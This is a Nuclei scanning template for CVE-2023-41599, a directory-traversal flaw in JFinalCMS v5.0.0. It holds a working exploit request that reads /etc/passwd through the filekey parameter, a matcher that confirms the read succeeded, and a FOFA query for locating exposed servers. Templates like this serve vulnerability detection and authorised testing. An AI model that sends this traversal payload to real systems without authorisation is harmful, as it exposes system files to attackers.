nuclei-templates/http/cves/2023/CVE-2023-41599.yaml

43 lines
1.4 KiB
YAML

id: CVE-2023-41599
info:
name: JFinalCMS v5.0.0 - Directory Traversal
author: pussycat0x
severity: medium
description: |
An issue in the component /common/DownController.java of JFinalCMS v5.0.0 allows attackers to execute a directory traversal.
reference:
- https://github.com/wy876/POC/blob/main/JFinalCMS%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E(CVE-2023-41599).md
- https://github.com/wy876/POC
- https://github.com/xingchennb/POC-
- https://github.com/Marco-zcl/POC
- https://github.com/d4n-sec/d4n-sec.github.io
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2023-41599
cwe-id: CWE-22
epss-score: 0.00047
epss-percentile: 0.17113
cpe: cpe:2.3:a:jfinalcms_project:jfinalcms:5.0.0:*:*:*:*:*:*:*
metadata:
vendor: jfinalcms_project
product: jfinalcms
fofa-query: body="content=\"JreCms"
tags: cve,cve2023,jrecms
http:
- method: GET
path:
- "{{BaseURL}}/common/down/file?filekey=/../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4b0a00483046022100826de30aa68fcef06d7f413cef902999ae9fe6710bc6936608d9a8a83de0a24e022100b67c95179ff4a58310712f3998f2e605aa905e43e532d02454eddde10eb9792f:922c64590222798bb761d5b6d8e72950